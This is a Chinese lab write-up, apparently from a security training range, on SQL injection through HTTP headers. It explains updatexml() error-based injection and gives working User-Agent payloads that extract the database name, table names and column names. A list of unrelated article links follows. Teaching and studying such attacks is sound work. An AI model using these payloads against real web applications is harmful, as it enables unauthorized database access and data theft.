掌控安全 -- header注入

http header注入

该注入是指利用后端验证客户端口信息(比如常用的cookie验证)或者通过http header中获取客户端的一些信息(比如useragent用户代理等其他http header字段信息),因为这些信息是会重新返回拼接到后台中的,所以再对这些信息进行sql处理,又因为后台没有进过相对应的信息处理所以构成了sql注入。

总结就是: 在传参时,后端为了验证或者获取客户端的一些信息,将这些信息存入到数据库但没有进行相关的处理,所以存在了header注入

User-Agent:

向服务器发送,包含了访问者系统引擎版本、浏览器信息的字段信息。一般服务器识别出是爬虫请求,会拒绝访问。所以此时设置User-Agent,可以将爬虫伪装成用户通过浏览器访问。

X-Forwarded-For 是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址.

updatexml (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称

第二个参数:XPath_string (Xpath格式的字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

复制代码
updatexml() 更新xml文档的函数
语法:updatexml(目标xml内容,xml文档路径,更新的内容)
构建语句
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

通过爆破我们知道username 和 password 为 admin 123456

而insert into 在登录之后才能执行,也就是靶场在登录之后才能执行head注入

然而我们发现 在User-agent后边拼接字符串他的页面会报错,所以知道了在UA这里存在注入

当我们发现将User-agent改为 1','2') -- 1的时候 会绕过过滤,页面显示正常

'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1),'2') -- 1

查询库名

这里and和or需要都试一下

然后获取到表名

'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x7e),1),'2') -- 1

'or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='flag_head'limit 0,1),0x7e),1),'2') -- 1

爆数据

然后就出来了

相关推荐
wangbing11253 分钟前
平台介绍-开放API后台微服务
数据库·微服务·架构
高一要励志成为佬6 分钟前
【数据库】第三章 关系数据库标准语言SQL
数据库·sql
幽络源小助理8 分钟前
逆向工程系统学习资源图谱(2026):从 Windows 内核、安卓安全到游戏协议分析的全栈教程清单
学习·安全·游戏·逆向工程
打不了嗝 ᥬ᭄12 分钟前
网易 UU 远程 2026年1月 新春升级深度测评:免登录破局 + 安全加码 + 运维专属,重新定义远程协助体验
运维·安全
尽兴-12 分钟前
MySQL执行UPDATE语句的全流程深度解析
数据库·mysql·innodb·dba·存储引擎·update
Lun3866buzha12 分钟前
街道施工场景中个人防护装备识别与安全监督系统详解_yolo12-C2PSA
安全
alonewolf_9915 分钟前
MySQL 架构与SQL执行全流程深度解析
sql·mysql·架构
MXM_77716 分钟前
laravel 并发控制写法-涉及资金
java·数据库·oracle
进阶的小名18 分钟前
[超轻量级消息队列(MQ)] Redis 不只是缓存:我用 Redis Stream 实现了一个 MQ(自定义注解方式)
数据库·spring boot·redis·缓存·消息队列·个人开发
列御寇19 分钟前
MongoDB分片集群——分片键(Shard Keys)概述
数据库·mongodb